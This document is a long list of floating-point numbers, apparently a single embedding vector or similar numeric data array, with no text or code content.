0.003614202607423067, -0.019409341737627983, 0.006795416586101055, 0.006659436970949173, -0.022730113938450813, 0.014392399229109287, -0.005618116818368435, -0.012832208536565304, 0.02307364158332348, 0.0047628749161958694, 0.0044014547020196915, -0.003318983130156994, 0.01029868796467781, -0.020754827186465263, -0.006745318882167339, 0.01660386100411415, 0.010212806053459644, 0.000585518719162792, -0.028856366872787476, 0.005929439328610897, 0.018092483282089233, 0.004075818695127964, 0.01922326348721981, -0.018292875960469246, -0.012732013128697872, -0.00037640490336343646, -0.005589489825069904, -0.01057064812630415, -0.020769141614437103, -0.0016156559577211738, 0.0010806823847815394, 0.004494493827223778, -0.003193738404661417, 0.0013007550733163953, -0.023503052070736885, 0.01325446180999279, -0.008430753834545612, -0.00034665927523747087, 0.021585019305348396, -0.01580229587852955, 0.0014054238563403487, -0.01597405970096588, -0.024662459269165993, -0.019652673974633217, 0.008123009465634823, -0.0030201852787286043, -0.015458768233656883, -0.01710483990609646, -0.02245815470814705, 0.007006543222814798, 0.018894050270318985, -0.00041822766070254147, -0.00001021107345877681, -0.030974790453910828, 0.00273749022744596, -0.002277663443237543, -0.005067040678113699, 0.02045423910021782, 0.02387520857155323, 0.008924575522542, 0.023517366498708725, 0.01487190742045641, 0.005177971441298723, 0.01192329078912735, -0.026709316298365593, -0.005528656765818596, 0.00576841039583087, 0.01090701948851347, 0.020640317350625992, 0.008180264383554459, 0.00016695559315849096, -0.007167572155594826, -0.00829477421939373, 0.01979581080377102, -0.01859346218407154, 0.01666111685335636, 0.004082975443452597, -0.0037466040812432766, -0.008802909404039383, -0.004533856175839901, -0.021084042266011238, 0.006187085527926683, -0.02919989451766014, -0.017018958926200867, -0.001986022340133786, 0.01127201784402132, 0.0024547951761633158, -0.008402126841247082, -0.021699529141187668, -0.0122167207300663, -0.020196594297885895, -0.02575029991567135, -0.0012175568845123053, 0.00711747445166111, 0.0008002238464541733, 0.013232991099357605, 0.020697573199868202, -0.013139952905476093, -0.01928051933646202, -0.005113559775054455, -0.002079061232507229, 0.031003417447209358, -0.01656092144548893, -0.009919376112520695, -0.010148394852876663, 0.01389142032712698, -0.012460052967071533, 0.004519542679190636, 0.016446411609649658, -0.004895276390016079, 0.00648051593452692, -0.006176350172609091, -0.006637966260313988, -0.008044284768402576, -0.025020301342010498, 0.009396926499903202, 0.0031740572303533554, -0.0018321502720937133, 0.018149739131331444, -0.004108024295419455, -0.008130166679620743, 0.02046855352818966, -0.006298016291111708, 0.0058936551213264465, 0.013340343721210957, 0.0332077220082283, 0.015587590634822845, 0.022744428366422653, 0.01487190742045641, 0.0002990216016769409, 0.005356892477720976, 0.016933076083660126, 0.007600560784339905, -0.0002341627550777048, -0.005571597721427679, -0.009282417595386505, -0.0006807941244915128, -0.0050026290118694305, 0.009554377757012844, -0.005084932781755924, -0.003141851397231221, 0.013175737112760544, -0.03197674825787544, -0.005041991826146841, 0.01098574511706829, 0.02636578679084778, 0.02054012194275856, -0.002676656935364008, 0.011078783310949802, -0.0003041655581910163, -0.017992287874221802, -0.0017185354372486472, -0.013540735468268394, -0.008602517656981945, -0.009583004750311375, 0.03237752988934517, -0.008917419239878654, 0.001351747545413673, 0.009046241641044617, 0.0021703108213841915, -0.00290567590855062, -0.0027965339832007885, 0.0063516926020383835, 0.0020844286773353815, 0.018851108849048615, -0.010756726376712322, 0.016160137951374054, 0.005092089530080557, 0.004054347984492779, -0.012309759855270386, 0.002037909347563982, -0.002857367042452097, -0.013569362461566925, -0.018779540434479713, 0.0005975958774797618, -0.001869723666459322, -0.013512108474969864, -0.0019448704551905394, -0.005092089530080557, -0.00547498045489192, -0.012832208536565304, -0.008280460722744465, 0.010821137577295303, 0.011157508939504623, -0.006720270030200481, 0.00594017468392849, 0.005192285403609276, 0.017434054985642433, -0.0017686333740130067, -0.018164051696658134, -0.03134694695472717, -0.006652279756963253, -0.0011656697606667876, -0.0049346392042934895, -0.006512721534818411, -0.016088569536805153, -0.0004915852332487702, -0.018407383933663368, 0.013397598639130592, -0.016918761655688286, 0.013433382846415043, 0.006824044045060873, 0.009504279121756554, 0.005539391655474901, -0.016188764944672585, 0.023331288248300552, -0.0238465815782547, 0.006995808333158493, -0.016875822097063065, -0.00799418706446886, 0.029944205656647682, 0.0006682696403004229, -0.004455131012946367, -0.0010162708349525928, -0.0010377413127571344, -0.008452224545180798, 0.01786346547305584, -0.007407326251268387, -0.022043058648705482, 0.00003237350392737426, 0.005056305322796106, -0.013018286786973476, -0.010083983652293682, -0.019037187099456787, -0.00030774399056099355, 0.021370315924286842, 0.013168579898774624, 0.0205544363707304, -0.014957789331674576, -0.000024196258891606703, 0.005904390476644039, -0.00013676268281415105, -0.02789735049009323, -0.0342383086681366, -0.0004059268394485116, 0.026909707114100456, 0.012653287500143051, 0.0031472190748900175, 0.0036374623887240887, 0.016704058274626732, 0.0013088065898045897, -0.011085940524935722, 0.001939502777531743, -0.009618788957595825, 0.02839832939207554, -0.014456810429692268, 0.0029325138311833143, -0.008717027492821217, 0.014020243659615517, -0.020268162712454796, -0.006849092897027731, -0.005500029306858778, -0.004698463249951601, 0.0077794818207621574, -0.013161422684788704, 0.004605424590408802, 0.016031315550208092, 0.016360528767108917, 0.009955160319805145, 0.0072176698595285416, 0.012095054611563683, -0.0031221702229231596, -0.015659159049391747, -0.007528992369771004, -0.020912278443574905, -0.004719933960586786, 0.016274647787213326, 0.044601406902074814, 0.00997663103044033, -0.0007800952298566699, -0.014843279495835304, 0.001128096366301179, -0.006877720355987549, -0.006154879927635193, -0.0024887900799512863, -0.0004215824301354587, 0.010921332985162735, 0.0006459045107476413, 0.0069814943708479404, 0.01995326206088066, -0.00010081075743073598, 0.008774282410740852, -0.0009661730146035552, 0.006584289949387312, -0.005521499551832676, 0.015358571894466877, -0.0017811577999964356, -0.008781438693404198, -0.00647693732753396, -0.01190897636115551, -0.004594689235091209, 0.0028806268237531185, -0.01487190742045641, 0.006766789127141237, -0.00896035972982645, 0.0004517753259278834, -0.010656530037522316, -0.004433660302311182, 0.029600678011775017, 0.007629188243299723, 0.012610347010195255, -0.0126175032928586, 0.018092483282089233, 0.014642888680100441, 0.01983875222504139, -0.024032657966017723, 0.008387813344597816, -0.024175794795155525, -0.004283366724848747, 0.014828965999186039, -0.006433996371924877, -0.013347500935196877, -0.0009545431239530444, 0.0383320190012455, 0.01258887629956007, -0.0067918384447693825, -0.0072212484665215015, 0.030774399638175964, 0.002794744912534952, -0.0027124411426484585, -0.001968130236491561, 0.010377413593232632, -0.00963310245424509, 0.008473695255815983, -0.009704670868813992, -0.009854964911937714, 0.007636344991624355, 0.01120760664343834, 0.01581661030650139, 0.010499079711735249, -0.01127201784402132, -0.012030642479658127, -0.027611076831817627, -0.0047414046712219715, 0.005843557417392731, -0.018350129947066307, 0.003057758556678891, 0.03180498257279396, 0.010584961622953415, 0.006147722713649273, -0.0033959192223846912, 0.01557327713817358, -0.005786302499473095, 0.0025335203390568495, -0.011264861561357975, 0.005854292772710323, -0.003700084751471877, 0.006999386474490166, 0.028956562280654907, -0.009167907759547234, -0.005496450699865818, -0.008946046233177185, -0.005721891298890114, 0.006179928779602051, 0.001018954673781991, 0.024046972393989563, 0.010291531682014465, 0.00002816606684064027, -0.02785440906882286, 0.008717027492821217, 0.012495837174355984, -0.0043012588284909725, -0.0041402303613722324, -0.01255309209227562, -0.011186135932803154, 0.0003097568405792117, -0.021627960726618767, 0.013139952905476093, -0.0002094493102049455, -0.012867992743849754, 0.007278503384441137, -0.01581661030650139, -0.013726812787353992, -0.004548169672489166, 0.012080741114914417, -0.00020810740534216166, 0.018879735842347145, 0.0000059267554206599016, -0.01023427676409483, -0.0035515802446752787, -0.02119855023920536, -0.003950573969632387, 0.02842695638537407, -0.030201852321624756, -0.009511436335742474, -0.039448484778404236, 0.01527268998324871, -0.010513393208384514, 0.02111266925930977, 0.023431483656167984, 0.020640317350625992, 0.007972716353833675, 0.0038575350772589445, -0.006634387653321028, 0.012445739470422268, -0.00681330868974328, -0.02051149494946003, -0.002372491406276822, 0.02058306336402893, 0.010112610645592213, -0.0019573948811739683, -0.000439027207903564, -0.00926094688475132, -0.007060219533741474, 0.016288960352540016, -0.01125054806470871, 0.0001353089464828372, -0.004276209976524115, 0.004913168493658304, 0.02640872821211815, -0.0033547673374414444, -0.0329214483499527, -0.023961089551448822, 0.011837407946586609, 0.009017614647746086, 0.006720270030200481, -0.004147387109696865, 0.01859346218407154, 0.009647415950894356, 0.0008704502834007144, -0.0030488125048577785, 0.013419069349765778, -0.0013580097584053874, -0.012130838818848133, -0.02507755719125271, -0.01524406298995018, 0.0022078840993344784, 0.009454181417822838, 0.021012473851442337, -0.03652849420905113, 0.007342914585024118, 0.004007828887552023, 0.010334472171962261, -0.024791283532977104, 0.017734641209244728, 0.0005676266155205667, -0.009668886661529541, -0.00989074818789959, -0.005929439328610897, -0.028183624148368835, -0.013669558800756931, 0.0041116029024124146, 0.018063856288790703, 0.0049095903523266315, -0.0010422143386676908, 0.002791166305541992, -0.018264247104525566, -0.023030702024698257, 0.0024995252024382353, 0.001898351009003818, 0.005113559775054455, -0.01490053441375494, -0.020153652876615524, 0.031518708914518356, -0.03778810054063797, -0.018407383933663368, -0.010756726376712322, 0.011171822436153889, 0.018779540434479713, 0.018922677263617516, -0.000823036243673414, -0.03661437705159187, -0.020096398890018463, -0.026265591382980347, 0.0052960594184696674, 0.014213478192687035, -0.010813980363309383, 0.003403075970709324, -0.02042561210691929, -0.012710542418062687, 0.007722226902842522, -0.014514065347611904, -0.005109981633722782, 0.027382059022784233, 0.00007235114753711969, -0.01452837884426117, 0.007893990725278854, -0.021699529141187668, -0.009726141579449177, 0.015129553154110909, 0.00543203903362155, -0.014957789331674576, -0.0037609178107231855, 0.018693657591938972, -0.013547892682254314, -0.006054684054106474, -0.009862121194601059, 0.014292203821241856, -0.008194577880203724, 0.03827476501464844, 0.004480179864913225, 0.028026172891259193, -0.02258697710931301, 0.014285046607255936, -0.000641878810711205, -0.019466595724225044, -0.013204364106059074, -0.011042999103665352, 0.010069669224321842, 0.003225944237783551, -0.0008878950611688197, -0.0013150688027963042, 0.011014372110366821, -0.02842695638537407, -0.0008266146760433912, 0.0010431089904159307, 0.0019699193071573973, -0.027410686016082764, 0.015587590634822845, 0.026251278817653656, -0.015773668885231018, 0.00012647472613025457, 0.016374843195080757, -0.00041084716212935746, 0.005492872558534145, -0.017634445801377296, -0.0067882598377764225, 0.01351926475763321, -0.007886834442615509, -0.024905793368816376, 0.00003617557376855984, 0.011744369752705097, -0.005983115639537573, -0.0005067934980615973, -0.0010636849328875542, -0.0008485324797220528, 0.005890076979994774, 0.0023707023356109858, 0.017577191814780235, 0.0046662576496601105, 0.00893173273652792, -0.006240761838853359, 0.018765226006507874, 0.030230479314923286, 0.0006803467986173928, -0.011035842821002007, -0.004823707975447178, -0.018822481855750084, 0.01855052076280117, -0.008402126841247082, -0.007936932146549225, -0.022773055359721184, -0.013454853557050228, -0.009010457433760166, -0.00011819963401649147, 0.009210849180817604, 0.013755440711975098, -0.02185698039829731, -0.02839832939207554, -0.010062512941658497, 0.0009142858907580376, 0.0066916425712406635, -0.00005717082603950985, 0.004601845983415842, 0.014743084087967873, -0.013426225632429123, -0.008724183775484562, 0.0015458767302334309, -0.004752139560878277, 0.011157508939504623, 0.004530277568846941, -0.016088569536805153, 0.02912832610309124, -0.02911401353776455, 0.024118540808558464, 0.003335085930302739, 0.00005999442146276124, 0.0021989380475133657, 0.013426225632429123, -0.0034943255595862865, 0.0041366517543792725, 0.0008547946927137673, -0.005907969083636999, 0.009783396497368813, -0.00038825839874334633, -0.01912306807935238, -0.004777188878506422, 0.01992463320493698, -0.0050992462784051895, 0.014957789331674576, 0.002930724760517478, 0.00594017468392849, 0.003979201428592205, 0.011973388493061066, 0.0037287119776010513, -0.017562877386808395, 0.004369249101728201, -0.0001890970452222973, -0.015558963641524315, -0.004244004376232624, -0.017577191814780235, 0.00029678508872166276, 0.004018563777208328, -0.00678110308945179, -0.018736599013209343, 0.0006517194560728967, 0.015773668885231018, 0.01716209575533867, 0.002189991995692253, -0.022128939628601074, 0.03169047459959984, -0.02250109612941742, -0.0032724638003855944, 0.0076792859472334385, -0.0065234568901360035, 0.0004781661555171013, -0.003950573969632387, 0.007629188243299723, 0.00012300813978072256, -0.006934974808245897, -0.013003972359001637, 0.01494347583502531, -0.004533856175839901, -0.010191335342824459, -0.018793852999806404, -0.0038181724958121777, -0.03887593746185303, 0.030087342485785484, -0.004079396836459637, -0.021327374503016472, -0.016231706365942955, 0.009010457433760166, 0.0006655858596786857, 0.005721891298890114, -0.027467940002679825, 0.017505623400211334, -0.018679345026612282, 0.003136483719572425, 0.03509712964296341, 0.017076212912797928, -0.01730523258447647, -0.002529941964894533, -0.006022478453814983, -0.003415600396692753, -0.0009545431239530444, -0.028884993866086006, 0.0038253292441368103, 0.0004551300953608006, -0.010284374468028545, 0.003519374644383788, 0.010456139221787453, -0.01288230624049902, -0.018407383933663368, 0.011772996746003628, 0.009790552780032158, -0.0317477285861969, 0.027367744594812393, 0.018936989828944206, -0.006709534674882889, -0.0009885381441563368, 0.006852671504020691, -0.0057290480472147465, 0.015287003479897976, -0.0021184238139539957, -0.0025710936170071363, 0.01222387794405222, -0.016918761655688286, 0.0016433886485174298, 0.005503607448190451, -0.010921332985162735, -0.01527268998324871, -0.010799666866660118, 0.028112055733799934, -0.003530109766870737, -0.000012713170690403786, -0.006233605090528727, 0.017548564821481705, -0.011186135932803154, 0.02449069544672966, 0.01024143397808075, 0.03707241639494896, 0.01225250493735075, -0.016403470188379288, -0.03824613615870476, -0.01647503860294819, -0.004362091887742281, -0.0039040546398609877, 0.02391814813017845, -0.026981275528669357, 0.01191613357514143, -0.018307188525795937, 0.005256696604192257, -0.011415154673159122, 0.012273975647985935, -0.0009057871648110449, -0.000341738952556625, 0.004855914041399956, 0.014771711081266403, 0.013454853557050228, 0.00681688729673624, 0.009683200158178806, -0.013168579898774624, 0.016131510958075523, 0.02051149494946003, -0.0018679344793781638, -0.007342914585024118, 0.011708585545420647, -0.01494347583502531, 0.015086612664163113, 0.006333800498396158, 0.009132123552262783, 0.004100867547094822, 0.0030112392269074917, 0.007196199614554644, 0.019666988402605057, -0.006097625009715557, 0.008681243285536766, -0.016761312261223793, 0.012052113190293312, -0.011959074065089226, 0.011751526035368443, 0.00416527921333909, -0.00008370144496439025, -0.0012202407233417034, -0.011973388493061066, -0.010112610645592213, -0.0015601904597133398, -0.015129553154110909, -0.007822422310709953, 0.010584961622953415, -0.014213478192687035, -0.012409955263137817, 0.0034782227594405413, -0.0277971550822258, 0.034181054681539536, -0.007031592074781656, -0.017018958926200867, -0.0002681577461771667, 0.022830309346318245, 0.008788595907390118, -0.012195250019431114, -0.006798995193094015, 0.004254739731550217, 0.009726141579449177, -0.005514342803508043, 0.004258317872881889, -0.0020558014512062073, -0.0003289908345323056, -0.0005917809321545064, 0.0019573948811739683, 0.03601320460438728, 0.00795840285718441, -0.011694271117448807, -0.0073930127546191216, 0.032062631100416183, 0.002175678499042988, 0.02378932572901249, 0.007378698792308569, -0.01124339085072279, 0.0010860500624403358, 0.013211521320044994, 0.005478558596223593, 0.0067882598377764225, -0.004494493827223778, -0.0026480297092348337, 0.021470511332154274, 0.009676043875515461, 0.022916192188858986, -0.025549907237291336, 0.010663687251508236, -0.002928935457020998, -0.0023760697804391384, -0.012273975647985935, 0.006398212164640427, -0.02260129153728485, 0.002036120044067502, 0.003692927770316601, -0.006401790771633387, -0.017763270065188408, 0.0037931236438453197, 0.012767797335982323, 0.011028685607016087, 0.005067040678113699, -0.013211521320044994, -0.006995808333158493, -0.00563600892201066, 0.011064469814300537, 0.0064268396236002445, -0.00223293318413198, 0.0010681579587981105, -0.010284374468028545, 0.012431425973773003, -0.010670843534171581, 0.0017274814890697598, 0.019695615395903587, -0.0013320662546902895, 0.03987789526581764, 0.009583004750311375, 0.006197820883244276, -0.009583004750311375, 0.02572167105972767, -0.00893173273652792, -0.03458183631300926, 0.003667878918349743, -0.0007461002678610384, 0.008416440337896347, 0.006845514755696058, -0.003925525117665529, -0.012488680891692638, 0.003932681865990162, -0.0077794818207621574, -0.0035605262964963913, 0.01291809044778347, 0.013819851912558079, 0.013268775306642056, -0.0019019293831661344, 0.023016387596726418, 0.01561621855944395, 0.014886220917105675, -0.0017113786889240146, -0.005950910039246082, -0.009883591905236244, 0.013097011484205723, 0.013698185794055462, -0.007328601088374853, 0.016174452379345894, 0.004898854997009039, 0.013841322623193264, -0.011121724732220173, 0.00030774399056099355, 0.004286945331841707, -0.02917126752436161, -0.022085998207330704, -0.02307364158332348, 0.004315572790801525, -0.003029131330549717, -0.002300922991707921, 0.01329740323126316, -0.001939502777531743, 0.016117196530103683, 0.007700756657868624, -0.0029521952383220196, 0.012109368108212948, 0.0022096734028309584, 0.0021434726659208536, 0.00778663856908679, -0.008802909404039383, 0.011522507295012474, -0.0034370708744972944, -0.019523851573467255, -0.006731004919856787, -0.007579090539366007, 0.016331901773810387, 0.03996377810835838, 0.024977361783385277, 0.011186135932803154, -0.017748955637216568, 0.0058220867067575455, 0.003975622821599245, 0.003936260472983122, -0.006072576157748699, 0.002347442554309964, 0.002792955609038472, 0.0021882029250264168, 0.0063087516464293, 0.008509479463100433, 0.03128968924283981, 0.015501708723604679, -0.016775626689195633, 0.014628574252128601, 0.003519374644383788, -0.0038754271809011698, 0.01666111685335636, -0.009382613003253937, 0.02844127081334591, 0.006906347814947367, 0.0020003358367830515, 0.012502994388341904, -0.017362486571073532, 0.0015548227820545435, 0.005657479632645845, -0.004032877739518881, -0.011458096094429493, -0.004981158301234245, -0.03048812597990036, -0.003907633014023304, -0.009318201802670956, -0.0012229245621711016, 0.01355504896491766, -0.0014465756248682737, 0.000502320472151041, -0.020940905436873436, -0.013411912135779858, -0.013433382846415043, 0.008609674870967865, 0.005192285403609276, -0.026308532804250717, -0.008581047877669334, 0.004787923768162727, 0.011407998390495777, 0.008459380827844143, -0.02177109755575657, 0.004122338257730007, 0.020182279869914055, 0.003433492500334978, 0.0177775826305151, -0.0007698072586208582, -0.006230026483535767, 0.002134526614099741, -0.010098297148942947, 0.0008950519259087741, 0.0007411799160763621, -0.018407383933663368, 0.009804866276681423, 0.021570706740021706, -0.00855241995304823, -0.0005425777053460479, 0.0009760136599652469, -0.02257266454398632, 0.006011743098497391, -0.004483758471906185, -0.01713346689939499, 0.0028358965646475554, -0.024862851947546005, -0.007206934969872236, 0.014506908133625984, -0.0032867772970348597, -0.007407326251268387, 0.0067166914232075214, -0.010191335342824459, 0.01155113521963358, -0.026723628863692284, 0.019609732553362846, -0.028255192562937737, -0.017763270065188408, 0.0003137825697194785, -0.00989074818789959, 0.025993632152676582, 0.002535309409722686, 0.001991389784961939, 0.0012640763306990266, -0.003433492500334978, 0.003544423496350646, -0.00614056596532464, 0.0009357564267702401, 0.009175064973533154, -0.012395641766488552, 0.010835451073944569, 0.02980106882750988, -0.015558963641524315, -0.008008500561118126, 0.011042999103665352, 0.022272076457738876, -0.017505623400211334, 0.012910934165120125, 0.005882919766008854, 0.005145765841007233, -0.013211521320044994, 0.0006651385338045657, -0.015687786042690277, -0.02052580751478672, -0.009203691966831684, 0.016102883964776993, 0.013848479837179184, 0.020897964015603065, -0.006319487001746893, -0.012674758210778236, 0.0005703104543499649, 0.004884541034698486, 0.0030434448271989822, 0.016317587345838547, -0.012273975647985935, -0.005238804500550032, 0.011343586258590221, 0.0047342474572360516, -0.0011674590641632676, 0.005553705617785454, -0.024734027683734894, -0.0028090584091842175, 0.012431425973773003, 0.001103047514334321, 0.002206095028668642, -0.005213755648583174, 0.0046412087976932526, -0.0020450660958886147, 0.016818566247820854, 0.02127011865377426, 0.010448982007801533, -0.007364385295659304, 0.006659436970949173, 0.020110711455345154, 0.008380656130611897, -0.01094996090978384, 0.003501482540741563, -0.009489965625107288, -0.000543472298886627, -0.04130926355719566, 0.0012855468085035682, 0.011529664508998394, 0.0042046415619552135, -0.024905793368816376, -0.020253848284482956, 0.013497794046998024, 0.0075146788731217384, -0.008280460722744465, -0.004065083339810371, 0.04030730575323105, 0.015487395226955414, 0.006673750467598438, -0.007929774932563305, -0.024361873045563698, 0.010771039873361588, 0.017992287874221802, 0.01598837412893772, -0.02725323475897312, -0.020182279869914055, -0.02653755061328411, -0.02391814813017845, 0.0033994975965470076, 0.020955218002200127, 0.0014635731931775808, 0.0022544036619365215, -0.011293488554656506, -0.0043012588284909725, -0.02439050003886223, -0.014471123926341534, 0.02444775588810444, -0.0019717086106538773, -0.0059902723878622055, 0.0028806268237531185, 0.0026712894905358553, -0.02775421366095543, -0.002132737310603261, 0.01928051933646202, 0.014914847910404205, -0.00795840285718441, -0.034696344286203384, 0.0019609732553362846, 0.024075599387288094, 0.014743084087967873, 0.011071627028286457, -0.005832822062075138, -0.010048199445009232, 0.013576519675552845, 0.016017001122236252, -0.010513393208384514, 0.002134526614099741, 0.007400169502943754, -0.0032724638003855944, 0.001827677246183157, 0.005088510923087597, -0.00412591639906168, 0.016145823523402214, 0.005249539855867624, 0.0004915852332487702, -0.008702713996171951, -0.011651330627501011, 0.02254403568804264, 0.016947390511631966, 0.020396985113620758, -0.019724242389202118, 0.00996947381645441, -0.012159465812146664, -0.014070341363549232, -0.007936932146549225, 0.00799418706446886, 0.012739169411361217, 0.016675429418683052, -0.013998772948980331, 0.00496684480458498, 0.0005756780738011003, 0.011479566805064678, -0.01723366416990757, -0.010849764570593834, 0.0005873079062439501, -0.004415768198668957, -0.01459994725883007, -0.01656092144548893, 0.007815266028046608, -0.02042561210691929, -0.018378756940364838, 0.006043948698788881, -0.001689013559371233, 0.003893319284543395, -0.0005707577220164239, 0.016360528767108917, 0.03858966380357742, 0.013190050609409809, 0.01258887629956007, -0.017849151045084, -0.01123623363673687, 0.012746326625347137, 0.007528992369771004, -0.0013920047786086798, -0.03389478102326393, -0.01862208917737007, 0.025592848658561707, 0.010033885017037392, 0.020053457468748093, -0.0031883709598332644, 0.0073142871260643005, 0.011450938880443573, -0.00581135181710124, 0.02109835483133793, 0.014492594636976719, 0.004190328065305948, 0.0010592119069769979, 0.0219428613781929, 0.00340665434487164, -0.02257266454398632, -0.015287003479897976, -0.013819851912558079, 0.012710542418062687, 0.024347558617591858, -0.012445739470422268, 0.035412028431892395, 0.03260654956102371, -0.003474644385278225, 0.010327315889298916, 0.008194577880203724, -0.004752139560878277, 0.0016407049261033535, -0.013139952905476093, 0.003907633014023304, 0.005779145751148462, -0.00041084716212935746, 0.000059043904911959544, -0.014320830814540386, 0.016818566247820854, -0.009353986009955406, 0.014206320978701115, 0.008359185419976711, 0.02178541198372841, -0.010076826438307762, 0.00694928877055645, 0.0007031592540442944, 0.014685829170048237, 0.0024923684541136026, 0.009575847536325455, -0.01584523729979992, -0.008573890663683414, 0.014857593923807144, 0.04059357941150665, -0.010792509652674198, -0.0015288792783394456, 0.003335085930302739, 0.007142523303627968, 0.016976017504930496, -0.02310227043926716, 0.024046972393989563, 0.01581661030650139, 0.01660386100411415, 0.005575175862759352, -0.014843279495835304, 0.007085268385708332, -0.009382613003253937, 0.012273975647985935, -0.0002697232994250953, 0.008001343347132206, -0.0010261115385219455, -0.007031592074781656, -0.008065755479037762, 0.002665921812877059, -0.014113282784819603, 0.0037215552292764187, -0.0009679622016847134, -0.0017936822259798646, -0.0053676278330385685, -0.012996816076338291, 0.000033967018680414185, -0.014134752564132214, 0.020082084462046623, -0.014299360103905201, 0.005220912396907806, -0.01998188905417919, -0.0009169697295874357, -0.004190328065305948, -0.020812081173062325, -0.018235620111227036, -0.013111324980854988, -0.019437968730926514, -0.0032849882263690233, -0.020826395601034164, -0.0007693599909543991, -0.013376127928495407, 0.0023653346579521894, -0.010785353370010853, -0.01153682079166174, -0.014335144311189651, -0.008029971271753311, 0.0029915578197687864, -0.009074869565665722, -0.010363100096583366, 0.00416527921333909, -0.03169047459959984, 0.023374229669570923, 0.0066236527636647224, 0.014149066992104053, 0.004487336613237858, -0.010355942882597446, 0.032148510217666626, -0.0015789770986884832, 0.014614260755479336, 0.015329944901168346, -0.0031454297713935375, 0.00664512300863862, 0.030115969479084015, -0.016933076083660126, -0.007292816881090403, -0.007772325072437525, 0.008115853182971478, 0.012760640121996403, 0.0031006995122879744, 0.010327315889298916, -0.0030380773823708296, 0.0013589044101536274, 0.002748225349932909, -0.008473695255815983, 0.0033798161894083023, 0.0085953613743186, 0.008759967982769012, 0.031003417447209358, 0.002245457610115409, -0.006301594898104668, 0.013247305527329445, 0.006466201972216368, 0.01553033571690321, 0.001841096323914826, -0.0020200172439217567, 0.009511436335742474, 0.011529664508998394, -0.004176014568656683, -0.016847193241119385, -0.010148394852876663, -0.03243478387594223, -0.004412190057337284, 0.01587386429309845, 0.004605424590408802, -0.008187421597540379, 0.01158691942691803, -0.004279788583517075, -0.014492594636976719, 0.014578476548194885, 0.014399555511772633, -0.0023080799728631973, -0.0015575066208839417, -0.012510150671005249, 0.014313673600554466, 0.001046687364578247, -0.0002455689536873251, 0.01322583481669426, -0.03778810054063797, 0.011136038228869438, -0.008717027492821217, -0.008080068975687027, 0.0036786142736673355, -0.006652279756963253, -0.01191613357514143, 0.0057254694402217865, -0.05419157072901726, -0.014005930162966251, 0.012753483839333057, 0.011000058613717556, 0.014828965999186039, 0.013247305527329445, -0.007893990725278854, 0.013275932520627975, -0.01131495926529169, 0.004680571146309376, 0.0026283483020961285, 0.011100254021584988, -0.01782052405178547, 0.0008476378861814737, 0.022701486945152283, 0.006977916229516268, -0.014585633762180805, 0.0544205866754055, -0.0018715128535404801, -0.0002525021554902196, 0.01926620490849018, -0.003936260472983122, 0.005381941329687834, 0.009189378470182419, -0.025521280243992805, -0.0013785857008770108, 0.01976718381047249, 0.0031203809194266796, -0.0002990216016769409, 0.012044956907629967, -0.01782052405178547, -0.001493989722803235, -0.015186808072030544, -0.00994084682315588, 0.008058598265051842, -0.023674815893173218, -0.017419740557670593, -0.01157260499894619, -0.0037609178107231855, 0.02244384028017521, -0.021613648161292076, 0.0010493712034076452, 0.014972102828323841, -0.003725133603438735, -0.0043764058500528336, 0.01723366416990757, -0.013705343008041382, 0.022329330444335938, -0.008953203447163105, -0.02129874750971794, 0.004906011745333672, 0.003615991910919547, 0.002374280709773302, 0.00028023490449413657, 0.009740455076098442, -0.008480851538479328, -0.0212128646671772, -0.0068812984973192215, 0.022100312635302544, -0.013741127215325832, 0.016933076083660126, 0.011529664508998394, -0.002928935457020998, -0.010556334629654884, -0.003304669400677085, -0.005156501196324825, -0.019652673974633217, -0.011085940524935722, 0.016704058274626732, 0.0033798161894083023, 0.01460710447281599, 0.011329272761940956, 0.006630809511989355, -0.006759632378816605, -0.014828965999186039, -0.004730669315904379, -0.016002686694264412, -0.018350129947066307, -0.02391814813017845, -0.017061898484826088, -0.0032742528710514307, -0.00799418706446886, -0.000711210654117167, 0.0025836180429905653, 0.03575555607676506, -0.013941518031060696, 0.012975345365703106, 0.007199777755886316, -0.005185128189623356, -0.0031901600304991007, -0.0007903832010924816, -0.004748561419546604, -0.026036573573946953, 0.010291531682014465, -0.00033122734748758376, -0.011851722374558449, 0.00044439485645852983, -0.008874477818608284, -0.002186413621529937, 0.007264189422130585, 0.0028269505128264427, 0.007893990725278854, -0.0061584580689668655, -0.012538778595626354, -0.0023635453544557095, -0.0030040822457522154, 0.021513452753424644, 0.002710652071982622, 0.019380714744329453, -0.013154266402125359, -0.003601678181439638, -0.006766789127141237, -0.009024770930409431, -0.0013562205713242292, 0.0008337714825756848, -0.005696841981261969, 0.00828761700540781, -0.012989658862352371, 0.013061227276921272, -0.020167967304587364, 0.015630532056093216, 0.01157260499894619, -0.0211412962526083, 0.012567405588924885, 0.014156223274767399, -0.02968655899167061, -0.017748955637216568, -0.006151301320642233, -0.012689071707427502, -0.006602182053029537, 0.010928490199148655, 0.01459994725883007, 0.007908305153250694, 0.007500364910811186, 0.014814652502536774, 0.0042296904139220715, -0.003700084751471877, -0.005904390476644039, -0.0061620366759598255, 0.03232027590274811, 0.0029969254974275827, 0.02124149166047573, 0.007189042866230011, 0.0066880639642477036, 0.01845032535493374, -0.006670171860605478, 0.015745041891932487, 0.007650658488273621, -0.024905793368816376, 0.01647503860294819, 0.0020307523664087057, 0.0029235677793622017, 0.006559241097420454, -0.0031024888157844543, 0.0038253292441368103, 0.015587590634822845, -0.006934974808245897, -0.018836794421076775, 0.04525983706116676, 0.0008306403760798275, 0.005056305322796106, -0.00016997488273773342, 0.007543306332081556, -0.005339000374078751, -0.010076826438307762, -0.0077794818207621574, -0.02391814813017845, 0.015029357746243477, 0.006917082704603672, 0.022028744220733643, 0.0038575350772589445, 0.006394634023308754, -0.002794744912534952, 0.013741127215325832, 0.0076792859472334385, -0.010549177415668964, -0.00014772158465348184, 0.0031597435008734465, 0.005700420588254929, -0.0005671793478541076, 0.012195250019431114, 0.017748955637216568, 0.030230479314923286, -0.0030201852787286043, -0.012681915424764156, 0.01386279333382845, 0.0034656983334571123, 0.0007890412816777825, -0.004863070789724588, 0.009439867921173573, -0.007650658488273621, 0.007843893021345139, 0.02195717580616474, 0.004340621642768383, 0.00543561764061451, 0.009862121194601059, -0.005389098078012466, 0.021527765318751335, -0.006376741919666529, -0.019337773323059082, -0.0007724910974502563, 0.03420967981219292, 0.01063505932688713, -0.011966231279075146, -0.01553033571690321, 0.014184851199388504, 0.004100867547094822, 0.009031928144395351, -0.007643501739948988, 0.01419916469603777, 0.007686442695558071, -0.0009572269627824426, 0.02046855352818966, 0.024275990203022957, 0.015716413035988808, 0.022014429792761803, -0.013941518031060696, 0.0034370708744972944, -0.011744369752705097, -0.005782724358141422, 0.02323109284043312 ]
